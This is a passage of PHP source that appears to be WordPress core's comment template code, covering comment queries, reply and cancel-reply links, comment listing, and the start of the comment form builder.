'orderby' => 'comment_date_gmt',
'order' => 'ASC',
'status' => 'approve',
'post_id' => $post->ID,
'no_found_rows' => false,
);
if ( get_option( 'thread_comments' ) ) {
$comment_args['hierarchical'] = 'threaded';
} else {
$comment_args['hierarchical'] = false;
}
if ( is_user_logged_in() ) {
$comment_args['include_unapproved'] = array( get_current_user_id() );
} else {
$unapproved_email = wp_get_unapproved_comment_author_email();
if ( $unapproved_email ) {
$comment_args['include_unapproved'] = array( $unapproved_email );
}
}
$per_page = 0;
if ( get_option( 'page_comments' ) ) {
$per_page = (int) get_query_var( 'comments_per_page' );
if ( 0 === $per_page ) {
$per_page = (int) get_option( 'comments_per_page' );
}
$comment_args['number'] = $per_page;
$page = (int) get_query_var( 'cpage' );
if ( $page ) {
$comment_args['offset'] = ( $page - 1 ) * $per_page;
} elseif ( 'oldest' === get_option( 'default_comments_page' ) ) {
$comment_args['offset'] = 0;
} else {
// If fetching the first page of 'newest', we need a top-level comment count.
$top_level_query = new WP_Comment_Query();
$top_level_args = array(
'count' => true,
'orderby' => false,
'post_id' => $post->ID,
'status' => 'approve',
);
if ( $comment_args['hierarchical'] ) {
$top_level_args['parent'] = 0;
}
if ( isset( $comment_args['include_unapproved'] ) ) {
$top_level_args['include_unapproved'] = $comment_args['include_unapproved'];
}
/**
* Filters the arguments used in the top level comments query.
*
* @since 5.6.0
*
* @see WP_Comment_Query::__construct()
*
* @param array $top_level_args {
* The top level query arguments for the comments template.
*
* @type bool $count Whether to return a comment count.
* @type string|array $orderby The field(s) to order by.
* @type int $post_id The post ID.
* @type string|array $status The comment status to limit results by.
* }
*/
$top_level_args = apply_filters( 'comments_template_top_level_query_args', $top_level_args );
$top_level_count = $top_level_query->query( $top_level_args );
$comment_args['offset'] = ( (int) ceil( $top_level_count / $per_page ) - 1 ) * $per_page;
}
}
/**
* Filters the arguments used to query comments in comments_template().
*
* @since 4.5.0
*
* @see WP_Comment_Query::__construct()
*
* @param array $comment_args {
* Array of WP_Comment_Query arguments.
*
* @type string|array $orderby Field(s) to order by.
* @type string $order Order of results. Accepts 'ASC' or 'DESC'.
* @type string $status Comment status.
* @type array $include_unapproved Array of IDs or email addresses whose unapproved comments
* will be included in results.
* @type int $post_id ID of the post.
* @type bool $no_found_rows Whether to refrain from querying for found rows.
* @type bool $update_comment_meta_cache Whether to prime cache for comment meta.
* @type bool|string $hierarchical Whether to query for comments hierarchically.
* @type int $offset Comment offset.
* @type int $number Number of comments to fetch.
* }
*/
$comment_args = apply_filters( 'comments_template_query_args', $comment_args );
$comment_query = new WP_Comment_Query( $comment_args );
$_comments = $comment_query->comments;
// Trees must be flattened before they're passed to the walker.
if ( $comment_args['hierarchical'] ) {
$comments_flat = array();
foreach ( $_comments as $_comment ) {
$comments_flat[] = $_comment;
$comment_children = $_comment->get_children(
array(
'format' => 'flat',
'status' => $comment_args['status'],
'orderby' => $comment_args['orderby'],
)
);
foreach ( $comment_children as $comment_child ) {
$comments_flat[] = $comment_child;
}
}
} else {
$comments_flat = $_comments;
}
/**
* Filters the comments array.
*
* @since 2.1.0
*
* @param array $comments Array of comments supplied to the comments template.
* @param int $post_id Post ID.
*/
$wp_query->comments = apply_filters( 'comments_array', $comments_flat, $post->ID );
$comments = &$wp_query->comments;
$wp_query->comment_count = count( $wp_query->comments );
$wp_query->max_num_comment_pages = $comment_query->max_num_pages;
if ( $separate_comments ) {
$wp_query->comments_by_type = separate_comments( $comments );
$comments_by_type = &$wp_query->comments_by_type;
} else {
$wp_query->comments_by_type = array();
}
$overridden_cpage = false;
if ( '' === get_query_var( 'cpage' ) && $wp_query->max_num_comment_pages > 1 ) {
set_query_var( 'cpage', 'newest' === get_option( 'default_comments_page' ) ? get_comment_pages_count() : 1 );
$overridden_cpage = true;
}
if ( ! defined( 'COMMENTS_TEMPLATE' ) ) {
define( 'COMMENTS_TEMPLATE', true );
}
$theme_template = trailingslashit( $wp_stylesheet_path ) . $file;
/**
* Filters the path to the theme template file used for the comments template.
*
* @since 1.5.1
*
* @param string $theme_template The path to the theme template file.
*/
$include = apply_filters( 'comments_template', $theme_template );
if ( file_exists( $include ) ) {
require $include;
} elseif ( file_exists( trailingslashit( $wp_template_path ) . $file ) ) {
require trailingslashit( $wp_template_path ) . $file;
} else { // Backward compat code will be removed in a future release.
require ABSPATH . WPINC . '/theme-compat/comments.php';
}
}
/**
* Displays the link to the comments for the current post ID.
*
* @since 0.71
*
* @param false|string $zero Optional. String to display when no comments. Default false.
* @param false|string $one Optional. String to display when only one comment is available. Default false.
* @param false|string $more Optional. String to display when there are more than one comment. Default false.
* @param string $css_class Optional. CSS class to use for comments. Default empty.
* @param false|string $none Optional. String to display when comments have been turned off. Default false.
*/
function comments_popup_link( $zero = false, $one = false, $more = false, $css_class = '', $none = false ) {
$post_id = get_the_ID();
$post_title = get_the_title();
$comments_number = (int) get_comments_number( $post_id );
if ( false === $zero ) {
/* translators: %s: Post title. */
$zero = sprintf( __( 'No Comments<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( false === $one ) {
/* translators: %s: Post title. */
$one = sprintf( __( '1 Comment<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( false === $more ) {
/* translators: 1: Number of comments, 2: Post title. */
$more = _n(
'%1$s Comment<span class="screen-reader-text"> on %2$s</span>',
'%1$s Comments<span class="screen-reader-text"> on %2$s</span>',
$comments_number
);
$more = sprintf( $more, number_format_i18n( $comments_number ), $post_title );
}
if ( false === $none ) {
/* translators: %s: Post title. */
$none = sprintf( __( 'Comments Off<span class="screen-reader-text"> on %s</span>' ), $post_title );
}
if ( 0 === $comments_number && ! comments_open() && ! pings_open() ) {
printf(
'<span%1$s>%2$s</span>',
! empty( $css_class ) ? ' class="' . esc_attr( $css_class ) . '"' : '',
$none
);
return;
}
if ( post_password_required() ) {
_e( 'Enter your password to view comments.' );
return;
}
if ( 0 === $comments_number ) {
$respond_link = get_permalink() . '#respond';
/**
* Filters the respond link when a post has no comments.
*
* @since 4.4.0
*
* @param string $respond_link The default response link.
* @param int $post_id The post ID.
*/
$comments_link = apply_filters( 'respond_link', $respond_link, $post_id );
} else {
$comments_link = get_comments_link();
}
$link_attributes = '';
/**
* Filters the comments link attributes for display.
*
* @since 2.5.0
*
* @param string $link_attributes The comments link attributes. Default empty.
*/
$link_attributes = apply_filters( 'comments_popup_link_attributes', $link_attributes );
printf(
'<a href="%1$s"%2$s%3$s>%4$s</a>',
esc_url( $comments_link ),
! empty( $css_class ) ? ' class="' . $css_class . '" ' : '',
$link_attributes,
get_comments_number_text( $zero, $one, $more )
);
}
/**
* Retrieves HTML content for reply to comment link.
*
* @since 2.7.0
* @since 4.4.0 Added the ability for `$comment` to also accept a WP_Comment object.
*
* @param array $args {
* Optional. Override default arguments.
*
* @type string $add_below The first part of the selector used to identify the comment to respond below.
* The resulting value is passed as the first parameter to addComment.moveForm(),
* concatenated as $add_below-$comment->comment_ID. Default 'comment'.
* @type string $respond_id The selector identifying the responding comment. Passed as the third parameter
* to addComment.moveForm(), and appended to the link URL as a hash value.
* Default 'respond'.
* @type string $reply_text The visible text of the Reply link. Default 'Reply'.
* @type string $reply_to_text The accessible name of the Reply link, using `%s` as a placeholder
* for the comment author's name. Default 'Reply to %s'.
* Should start with the visible `reply_text` value.
* @type bool $show_reply_to_text Whether to use `reply_to_text` as visible link text. Default false.
* @type string $login_text The text of the link to reply if logged out. Default 'Log in to Reply'.
* @type int $max_depth The max depth of the comment tree. Default 0.
* @type int $depth The depth of the new comment. Must be greater than 0 and less than the value
* of the 'thread_comments_depth' option set in Settings > Discussion. Default 0.
* @type string $before The text or HTML to add before the reply link. Default empty.
* @type string $after The text or HTML to add after the reply link. Default empty.
* }
* @param int|WP_Comment $comment Optional. Comment being replied to. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
* @return string|false|null Link to show comment form on success. False if comments are closed. Null on failure.
*/
function get_comment_reply_link( $args = array(), $comment = null, $post = null ) {
$defaults = array(
'add_below' => 'comment',
'respond_id' => 'respond',
'reply_text' => __( 'Reply' ),
/* translators: Comment reply button text. %s: Comment author name. */
'reply_to_text' => __( 'Reply to %s' ),
'login_text' => __( 'Log in to Reply' ),
'max_depth' => 0,
'depth' => 0,
'before' => '',
'after' => '',
'show_reply_to_text' => false,
);
$args = wp_parse_args( $args, $defaults );
$args['max_depth'] = (int) $args['max_depth'];
$args['depth'] = (int) $args['depth'];
if ( 0 === $args['depth'] || $args['max_depth'] <= $args['depth'] ) {
return null;
}
$comment = get_comment( $comment );
if ( empty( $comment ) ) {
return null;
}
if ( empty( $post ) ) {
$post = $comment->comment_post_ID;
}
$post = get_post( $post );
if ( ! comments_open( $post->ID ) ) {
return false;
}
if ( get_option( 'page_comments' ) ) {
$permalink = str_replace( '#comment-' . $comment->comment_ID, '', get_comment_link( $comment ) );
} else {
$permalink = get_permalink( $post->ID );
}
/**
* Filters the comment reply link arguments.
*
* @since 4.1.0
*
* @param array $args Comment reply link arguments. See get_comment_reply_link()
* for more information on accepted arguments.
* @param WP_Comment $comment The object of the comment being replied to.
* @param WP_Post $post The WP_Post object.
*/
$args = apply_filters( 'comment_reply_link_args', $args, $comment, $post );
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) {
$link = sprintf(
'<a rel="nofollow" class="comment-reply-login" href="%s">%s</a>',
esc_url( wp_login_url( get_permalink() ) ),
$args['login_text']
);
} else {
$data_attributes = array(
'commentid' => $comment->comment_ID,
'postid' => $post->ID,
'belowelement' => $args['add_below'] . '-' . $comment->comment_ID,
'respondelement' => $args['respond_id'],
'replyto' => sprintf( $args['reply_to_text'], get_comment_author( $comment ) ),
);
$data_attribute_string = '';
foreach ( $data_attributes as $name => $value ) {
$data_attribute_string .= " data-{$name}=\"" . esc_attr( $value ) . '"';
}
$data_attribute_string = trim( $data_attribute_string );
$reply_text = $args['show_reply_to_text']
? sprintf( $args['reply_to_text'], get_comment_author( $comment ) )
: $args['reply_text'];
$aria_label = $args['show_reply_to_text'] ? '' : sprintf( $args['reply_to_text'], get_comment_author( $comment ) );
$link = sprintf(
'<a rel="nofollow" class="comment-reply-link" href="%s" %s%s>%s</a>',
esc_url(
add_query_arg(
array(
'replytocom' => $comment->comment_ID,
'unapproved' => false,
'moderation-hash' => false,
),
$permalink
)
) . '#' . $args['respond_id'],
$data_attribute_string,
$aria_label ? ' aria-label="' . esc_attr( $aria_label ) . '"' : '',
$reply_text
);
}
$comment_reply_link = $args['before'] . $link . $args['after'];
/**
* Filters the comment reply link.
*
* @since 2.7.0
*
* @param string $comment_reply_link The HTML markup for the comment reply link.
* @param array $args An array of arguments overriding the defaults.
* @param WP_Comment $comment The object of the comment being replied.
* @param WP_Post $post The WP_Post object.
*/
return apply_filters( 'comment_reply_link', $comment_reply_link, $args, $comment, $post );
}
/**
* Displays the HTML content for reply to comment link.
*
* @since 2.7.0
*
* @see get_comment_reply_link()
*
* @param array $args Optional. Override default options. Default empty array.
* @param int|WP_Comment $comment Optional. Comment being replied to. Default current comment.
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
*/
function comment_reply_link( $args = array(), $comment = null, $post = null ) {
echo get_comment_reply_link( $args, $comment, $post );
}
/**
* Retrieves HTML content for reply to post link.
*
* @since 2.7.0
*
* @param array $args {
* Optional. Override default arguments.
*
* @type string $add_below The first part of the selector used to identify the comment to respond below.
* The resulting value is passed as the first parameter to addComment.moveForm(),
* concatenated as $add_below-$comment->comment_ID. Default is 'post'.
* @type string $respond_id The selector identifying the responding comment. Passed as the third parameter
* to addComment.moveForm(), and appended to the link URL as a hash value.
* Default 'respond'.
* @type string $reply_text Text of the Reply link. Default is 'Leave a Comment'.
* @type string $login_text Text of the link to reply if logged out. Default is 'Log in to leave a Comment'.
* @type string $before Text or HTML to add before the reply link. Default empty.
* @type string $after Text or HTML to add after the reply link. Default empty.
* }
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
* @return string|false Link to show comment form on success. False if comments are closed.
*/
function get_post_reply_link( $args = array(), $post = null ) {
$defaults = array(
'add_below' => 'post',
'respond_id' => 'respond',
'reply_text' => __( 'Leave a Comment' ),
'login_text' => __( 'Log in to leave a Comment' ),
'before' => '',
'after' => '',
);
$args = wp_parse_args( $args, $defaults );
$post = get_post( $post );
if ( ! comments_open( $post->ID ) ) {
return false;
}
if ( get_option( 'comment_registration' ) && ! is_user_logged_in() ) {
$link = sprintf(
'<a rel="nofollow" class="comment-reply-login" href="%s">%s</a>',
wp_login_url( get_permalink() ),
$args['login_text']
);
} else {
$onclick = sprintf(
'return addComment.moveForm( "%1$s-%2$s", "0", "%3$s", "%2$s" )',
$args['add_below'],
$post->ID,
$args['respond_id']
);
$link = sprintf(
"<a rel='nofollow' class='comment-reply-link' href='%s' onclick='%s'>%s</a>",
get_permalink( $post->ID ) . '#' . $args['respond_id'],
$onclick,
$args['reply_text']
);
}
$post_reply_link = $args['before'] . $link . $args['after'];
/**
* Filters the formatted post comments link HTML.
*
* @since 2.7.0
*
* @param string $post_reply_link The HTML-formatted post comments link.
* @param int|WP_Post $post The post ID or WP_Post object.
*/
return apply_filters( 'post_comments_link', $post_reply_link, $post );
}
/**
* Displays the HTML content for reply to post link.
*
* @since 2.7.0
*
* @see get_post_reply_link()
*
* @param array $args Optional. Override default options. Default empty array.
* @param int|WP_Post $post Optional. Post ID or WP_Post object the comment is going to be displayed on.
* Default current post.
*/
function post_reply_link( $args = array(), $post = null ) {
echo get_post_reply_link( $args, $post );
}
/**
* Retrieves HTML content for cancel comment reply link.
*
* @since 2.7.0
* @since 6.2.0 Added the `$post` parameter.
*
* @param string $link_text Optional. Text to display for cancel reply link. If empty,
* defaults to 'Click here to cancel reply'. Default empty.
* @param int|WP_Post|null $post Optional. The post the comment thread is being
* displayed for. Defaults to the current global post.
* @return string
*/
function get_cancel_comment_reply_link( $link_text = '', $post = null ) {
if ( empty( $link_text ) ) {
$link_text = __( 'Click here to cancel reply.' );
}
$post = get_post( $post );
$reply_to_id = $post ? _get_comment_reply_id( $post->ID ) : 0;
$link_style = 0 !== $reply_to_id ? '' : ' style="display:none;"';
$link_url = esc_url( remove_query_arg( array( 'replytocom', 'unapproved', 'moderation-hash' ) ) ) . '#respond';
$cancel_comment_reply_link = sprintf(
'<a rel="nofollow" id="cancel-comment-reply-link" href="%1$s"%2$s>%3$s</a>',
$link_url,
$link_style,
$link_text
);
/**
* Filters the cancel comment reply link HTML.
*
* @since 2.7.0
*
* @param string $cancel_comment_reply_link The HTML-formatted cancel comment reply link.
* @param string $link_url Cancel comment reply link URL.
* @param string $link_text Cancel comment reply link text.
*/
return apply_filters( 'cancel_comment_reply_link', $cancel_comment_reply_link, $link_url, $link_text );
}
/**
* Displays HTML content for cancel comment reply link.
*
* @since 2.7.0
*
* @param string $link_text Optional. Text to display for cancel reply link. If empty,
* defaults to 'Click here to cancel reply'. Default empty.
*/
function cancel_comment_reply_link( $link_text = '' ) {
echo get_cancel_comment_reply_link( $link_text );
}
/**
* Retrieves hidden input HTML for replying to comments.
*
* @since 3.0.0
* @since 6.2.0 Renamed `$post_id` to `$post` and added WP_Post support.
*
* @param int|WP_Post|null $post Optional. The post the comment is being displayed for.
* Defaults to the current global post.
* @return string Hidden input HTML for replying to comments.
*/
function get_comment_id_fields( $post = null ) {
$post = get_post( $post );
if ( ! $post ) {
return '';
}
$post_id = $post->ID;
$reply_to_id = _get_comment_reply_id( $post_id );
$comment_id_fields = "<input type='hidden' name='comment_post_ID' value='$post_id' id='comment_post_ID' />\n";
$comment_id_fields .= "<input type='hidden' name='comment_parent' id='comment_parent' value='$reply_to_id' />\n";
/**
* Filters the returned comment ID fields.
*
* @since 3.0.0
*
* @param string $comment_id_fields The HTML-formatted hidden ID field comment elements.
* @param int $post_id The post ID.
* @param int $reply_to_id The ID of the comment being replied to.
*/
return apply_filters( 'comment_id_fields', $comment_id_fields, $post_id, $reply_to_id );
}
/**
* Outputs hidden input HTML for replying to comments.
*
* Adds two hidden inputs to the comment form to identify the `comment_post_ID`
* and `comment_parent` values for threaded comments.
*
* This tag must be within the `<form>` section of the `comments.php` template.
*
* @since 2.7.0
* @since 6.2.0 Renamed `$post_id` to `$post` and added WP_Post support.
*
* @see get_comment_id_fields()
*
* @param int|WP_Post|null $post Optional. The post the comment is being displayed for.
* Defaults to the current global post.
*/
function comment_id_fields( $post = null ) {
echo get_comment_id_fields( $post );
}
/**
* Displays text based on comment reply status.
*
* Only affects users with JavaScript disabled.
*
* {@internal The $comment global must be present to allow template tags access to the current
* comment. See https://core.trac.wordpress.org/changeset/36512.}
*
* @since 2.7.0
* @since 6.2.0 Added the `$post` parameter.
*
* @global WP_Comment $comment Global comment object.
*
* @param string|false $no_reply_text Optional. Text to display when not replying to a comment.
* Default false.
* @param string|false $reply_text Optional. Text to display when replying to a comment.
* Default false. Accepts "%s" for the author of the comment
* being replied to.
* @param bool $link_to_parent Optional. Boolean to control making the author's name a link
* to their comment. Default true.
* @param int|WP_Post|null $post Optional. The post that the comment form is being displayed for.
* Defaults to the current global post.
*/
function comment_form_title( $no_reply_text = false, $reply_text = false, $link_to_parent = true, $post = null ) {
global $comment;
if ( false === $no_reply_text ) {
$no_reply_text = __( 'Leave a Reply' );
}
if ( false === $reply_text ) {
/* translators: %s: Author of the comment being replied to. */
$reply_text = __( 'Leave a Reply to %s' );
}
$post = get_post( $post );
if ( ! $post ) {
echo $no_reply_text;
return;
}
$reply_to_id = _get_comment_reply_id( $post->ID );
if ( 0 === $reply_to_id ) {
echo $no_reply_text;
return;
}
// Sets the global so that template tags can be used in the comment form.
$comment = get_comment( $reply_to_id );
if ( $link_to_parent ) {
$comment_author = sprintf(
'<a href="#comment-%1$s">%2$s</a>',
get_comment_ID(),
get_comment_author( $reply_to_id )
);
} else {
$comment_author = get_comment_author( $reply_to_id );
}
printf( $reply_text, $comment_author );
}
/**
* Gets the comment's reply to ID from the $_GET['replytocom'].
*
* @since 6.2.0
*
* @access private
*
* @param int|WP_Post $post The post the comment is being displayed for.
* Defaults to the current global post.
* @return int Comment's reply to ID.
*/
function _get_comment_reply_id( $post = null ) {
$post = get_post( $post );
if ( ! $post || ! isset( $_GET['replytocom'] ) || ! is_numeric( $_GET['replytocom'] ) ) {
return 0;
}
$reply_to_id = (int) $_GET['replytocom'];
/*
* Validate the comment.
* Bail out if it does not exist, is not approved, or its
* `comment_post_ID` does not match the given post ID.
*/
$comment = get_comment( $reply_to_id );
if (
! $comment instanceof WP_Comment ||
0 === (int) $comment->comment_approved ||
$post->ID !== (int) $comment->comment_post_ID
) {
return 0;
}
return $reply_to_id;
}
/**
* Displays a list of comments.
*
* Used in the comments.php template to list comments for a particular post.
*
* @since 2.7.0
*
* @see WP_Query::$comments
*
* @global WP_Query $wp_query WordPress Query object.
* @global int $comment_alt
* @global int $comment_depth
* @global int $comment_thread_alt
* @global bool $overridden_cpage
* @global bool $in_comment_loop
*
* @param string|array $args {
* Optional. Formatting options.
*
* @type object $walker Instance of a Walker class to list comments. Default null.
* @type int $max_depth The maximum comments depth. Default empty.
* @type string $style The style of list ordering. Accepts 'ul', 'ol', or 'div'.
* 'div' will result in no additional list markup. Default 'ul'.
* @type callable $callback Callback function to use. Default null.
* @type callable $end-callback Callback function to use at the end. Default null.
* @type string $type Type of comments to list. Accepts 'all', 'comment',
* 'pingback', 'trackback', 'pings'. Default 'all'.
* @type int $page Page ID to list comments for. Default empty.
* @type int $per_page Number of comments to list per page. Default empty.
* @type int $avatar_size Height and width dimensions of the avatar size. Default 32.
* @type bool $reverse_top_level Ordering of the listed comments. If true, will display
* newest comments first. Default null.
* @type bool $reverse_children Whether to reverse child comments in the list. Default null.
* @type string $format How to format the comments list. Accepts 'html5', 'xhtml'.
* Default 'html5' if the theme supports it.
* @type bool $short_ping Whether to output short pings. Default false.
* @type bool $echo Whether to echo the output or return it. Default true.
* }
* @param WP_Comment[] $comments Optional. Array of WP_Comment objects. Default null.
* @return void|string Void if 'echo' argument is true, or no comments to list.
* Otherwise, HTML list of comments.
*/
function wp_list_comments( $args = array(), $comments = null ) {
global $wp_query, $comment_alt, $comment_depth, $comment_thread_alt, $overridden_cpage, $in_comment_loop;
$in_comment_loop = true;
$comment_alt = 0;
$comment_thread_alt = 0;
$comment_depth = 1;
$defaults = array(
'walker' => null,
'max_depth' => '',
'style' => 'ul',
'callback' => null,
'end-callback' => null,
'type' => 'all',
'page' => '',
'per_page' => '',
'avatar_size' => 32,
'reverse_top_level' => null,
'reverse_children' => '',
'format' => current_theme_supports( 'html5', 'comment-list' ) ? 'html5' : 'xhtml',
'short_ping' => false,
'echo' => true,
);
$parsed_args = wp_parse_args( $args, $defaults );
/**
* Filters the arguments used in retrieving the comment list.
*
* @since 4.0.0
*
* @see wp_list_comments()
*
* @param array $parsed_args An array of arguments for displaying comments.
*/
$parsed_args = apply_filters( 'wp_list_comments_args', $parsed_args );
// Figure out what comments we'll be looping through ($_comments).
if ( null !== $comments ) {
$comments = (array) $comments;
if ( empty( $comments ) ) {
return;
}
if ( 'all' !== $parsed_args['type'] ) {
$comments_by_type = separate_comments( $comments );
if ( empty( $comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $comments;
}
} else {
/*
* If 'page' or 'per_page' has been passed, and does not match what's in $wp_query,
* perform a separate comment query and allow Walker_Comment to paginate.
*/
if ( $parsed_args['page'] || $parsed_args['per_page'] ) {
$current_cpage = (int) get_query_var( 'cpage' );
if ( ! $current_cpage ) {
$current_cpage = 'newest' === get_option( 'default_comments_page' ) ? 1 : $wp_query->max_num_comment_pages;
}
$current_per_page = (int) get_query_var( 'comments_per_page' );
if ( (int) $parsed_args['page'] !== $current_cpage || (int) $parsed_args['per_page'] !== $current_per_page ) {
$comment_args = array(
'post_id' => get_the_ID(),
'orderby' => 'comment_date_gmt',
'order' => 'ASC',
'status' => 'approve',
);
if ( is_user_logged_in() ) {
$comment_args['include_unapproved'] = array( get_current_user_id() );
} else {
$unapproved_email = wp_get_unapproved_comment_author_email();
if ( $unapproved_email ) {
$comment_args['include_unapproved'] = array( $unapproved_email );
}
}
$comments = get_comments( $comment_args );
if ( 'all' !== $parsed_args['type'] ) {
$comments_by_type = separate_comments( $comments );
if ( empty( $comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $comments;
}
}
// Otherwise, fall back on the comments from `$wp_query->comments`.
} else {
if ( empty( $wp_query->comments ) ) {
return;
}
if ( 'all' !== $parsed_args['type'] ) {
if ( empty( $wp_query->comments_by_type ) ) {
$wp_query->comments_by_type = separate_comments( $wp_query->comments );
}
if ( empty( $wp_query->comments_by_type[ $parsed_args['type'] ] ) ) {
return;
}
$_comments = $wp_query->comments_by_type[ $parsed_args['type'] ];
} else {
$_comments = $wp_query->comments;
}
if ( $wp_query->max_num_comment_pages ) {
$default_comments_page = get_option( 'default_comments_page' );
$cpage = (int) get_query_var( 'cpage' );
if ( 'newest' === $default_comments_page ) {
$parsed_args['cpage'] = $cpage;
} elseif ( 1 === $cpage ) {
/*
* When the first page shows the oldest comments,
* post permalink is the same as the comment permalink.
*/
$parsed_args['cpage'] = '';
} else {
$parsed_args['cpage'] = $cpage;
}
$parsed_args['page'] = 0;
$parsed_args['per_page'] = 0;
}
}
}
if ( '' === $parsed_args['per_page'] && get_option( 'page_comments' ) ) {
$parsed_args['per_page'] = get_query_var( 'comments_per_page' );
}
if ( empty( $parsed_args['per_page'] ) ) {
$parsed_args['per_page'] = 0;
$parsed_args['page'] = 0;
}
if ( '' === $parsed_args['max_depth'] ) {
if ( get_option( 'thread_comments' ) ) {
$parsed_args['max_depth'] = get_option( 'thread_comments_depth' );
} else {
$parsed_args['max_depth'] = -1;
}
}
if ( '' === $parsed_args['page'] ) {
if ( empty( $overridden_cpage ) ) {
$parsed_args['page'] = get_query_var( 'cpage' );
} else {
$threaded = ( -1 !== (int) $parsed_args['max_depth'] );
$parsed_args['page'] = ( 'newest' === get_option( 'default_comments_page' ) ) ? get_comment_pages_count( $_comments, $parsed_args['per_page'], $threaded ) : 1;
set_query_var( 'cpage', $parsed_args['page'] );
}
}
// Validation check.
$parsed_args['page'] = (int) $parsed_args['page'];
$parsed_args['per_page'] = (int) $parsed_args['per_page'];
if ( 0 === $parsed_args['page'] && 0 !== $parsed_args['per_page'] ) {
$parsed_args['page'] = 1;
}
if ( null === $parsed_args['reverse_top_level'] ) {
$parsed_args['reverse_top_level'] = ( 'desc' === get_option( 'comment_order' ) );
}
if ( empty( $parsed_args['walker'] ) ) {
$walker = new Walker_Comment();
} else {
$walker = $parsed_args['walker'];
}
$output = $walker->paged_walk( $_comments, $parsed_args['max_depth'], $parsed_args['page'], $parsed_args['per_page'], $parsed_args );
$in_comment_loop = false;
if ( $parsed_args['echo'] ) {
echo $output;
} else {
return $output;
}
}
/**
* Outputs a complete commenting form for use within a template.
*
* Most strings and form fields may be controlled through the `$args` array passed
* into the function, while you may also choose to use the {@see 'comment_form_default_fields'}
* filter to modify the array of default fields if you'd just like to add a new
* one or remove a single field. All fields are also individually passed through
* a filter of the {@see 'comment_form_field_$name'} where `$name` is the key used
* in the array of fields.
*
* @since 3.0.0
* @since 4.1.0 Introduced the 'class_submit' argument.
* @since 4.2.0 Introduced the 'submit_button' and 'submit_fields' arguments.
* @since 4.4.0 Introduced the 'class_form', 'title_reply_before', 'title_reply_after',
* 'cancel_reply_before', and 'cancel_reply_after' arguments.
* @since 4.5.0 The 'author', 'email', and 'url' form fields are limited to 245, 100,
* and 200 characters, respectively.
* @since 4.6.0 Introduced the 'action' argument.
* @since 4.9.6 Introduced the 'cookies' default comment field.
* @since 5.5.0 Introduced the 'class_container' argument.
* @since 6.8.2 Introduced the 'novalidate' argument.
*
* @param array $args {
* Optional. Default arguments and form fields to override.
*
* @type array $fields {
* Default comment fields, filterable by default via the {@see 'comment_form_default_fields'} hook.
*
* @type string $author Comment author field HTML.
* @type string $email Comment author email field HTML.
* @type string $url Comment author URL field HTML.
* @type string $cookies Comment cookie opt-in field HTML.
* }
* @type string $comment_field The comment textarea field HTML.
* @type string $must_log_in HTML element for a 'must be logged in to comment' message.
* @type string $logged_in_as The HTML for the 'logged in as [user]' message, the Edit profile link,
* and the Log out link.
* @type string $comment_notes_before HTML element for a message displayed before the comment fields
* if the user is not logged in.
* Default 'Your email address will not be published.'.
* @type string $comment_notes_after HTML element for a message displayed after the textarea field.
* @type string $action The comment form element action attribute. Default '/wp-comments-post.php'.
* @type bool $novalidate Whether the novalidate attribute is added to the comment form. Default false.
* @type string $id_form The comment form element id attribute. Default 'commentform'.
* @type string $id_submit The comment submit element id attribute. Default 'submit'.
* @type string $class_container The comment form container class attribute. Default 'comment-respond'.
* @type string $class_form The comment form element class attribute. Default 'comment-form'.
* @type string $class_submit The comment submit element class attribute. Default 'submit'.
* @type string $name_submit The comment submit element name attribute. Default 'submit'.
* @type string $title_reply The translatable 'reply' button label. Default 'Leave a Reply'.
* @type string $title_reply_to The translatable 'reply-to' button label. Default 'Leave a Reply to %s',
* where %s is the author of the comment being replied to.
* @type string $title_reply_before HTML displayed before the comment form title.
* Default: '<h3 id="reply-title" class="comment-reply-title">'.
* @type string $title_reply_after HTML displayed after the comment form title.
* Default: '</h3>'.
* @type string $cancel_reply_before HTML displayed before the cancel reply link.
* @type string $cancel_reply_after HTML displayed after the cancel reply link.
* @type string $cancel_reply_link The translatable 'cancel reply' button label. Default 'Cancel reply'.
* @type string $label_submit The translatable 'submit' button label. Default 'Post a comment'.
* @type string $submit_button HTML format for the Submit button.
* Default: '<input name="%1$s" type="submit" id="%2$s" class="%3$s" value="%4$s" />'.
* @type string $submit_field HTML format for the markup surrounding the Submit button and comment hidden
* fields. Default: '<p class="form-submit">%1$s %2$s</p>', where %1$s is the
* submit button markup and %2$s is the comment hidden fields.
* @type string $format The comment form format. Default 'xhtml'. Accepts 'xhtml', 'html5'.
* }
* @param int|WP_Post $post Optional. Post ID or WP_Post object to generate the form for. Default current post.
*/
function comment_form( $args = array(), $post = null ) {
$post = get_post( $post );
// Exit the function if the post is invalid or comments are closed.
if ( ! $post || ! comments_open( $post ) ) {
/**
* Fires after the comment form if comments are closed.
*
* For backward compatibility, this action also fires if comment_form()
* is called with an invalid post object or ID.
*
* @since 3.0.0
*/
do_action( 'comment_form_comments_closed' );
return;
}
$post_id = $post->ID;
$commenter = wp_get_current_commenter();
$user = wp_get_current_user();
$user_identity = $user->exists() ? $user->display_name : '';
$args = wp_parse_args( $args );
if ( ! isset( $args['format'] ) ) {
$args['format'] = current_theme_supports( 'html5', 'comment-form' ) ? 'html5' : 'xhtml';
}
$req = get_option( 'require_name_email' );
$html5 = 'html5' === $args['format'];
// Define attributes in HTML5 or XHTML syntax.
$required_attribute = ( $html5 ? ' required' : ' required="required"' );
$checked_attribute = ( $html5 ? ' checked' : ' checked="checked"' );
// Identify required fields visually and create a message about the indicator.
$required_indicator = ' ' . wp_required_field_indicator();
$required_text = ' ' . wp_required_field_message();
$fields = array(
'author' => sprintf(
'<p class="comment-form-author">%s %s</p>',
sprintf(
'<label for="author">%s%s</label>',
__( 'Name' ),
( $req ? $required_indicator : '' )
),
sprintf(
'<input id="author" name="author" type="text" value="%s" size="30" maxlength="245" autocomplete="name"%s />',
esc_attr( $commenter['comment_author'] ),
( $req ? $required_attribute : '' )
)
),
'email' => sprintf(
'<p class="comment-form-email">%s %s</p>',
sprintf(
'<label for="email">%s%s</label>',
__( 'Email' ),
( $req ? $required_indicator : '' )
),
sprintf(
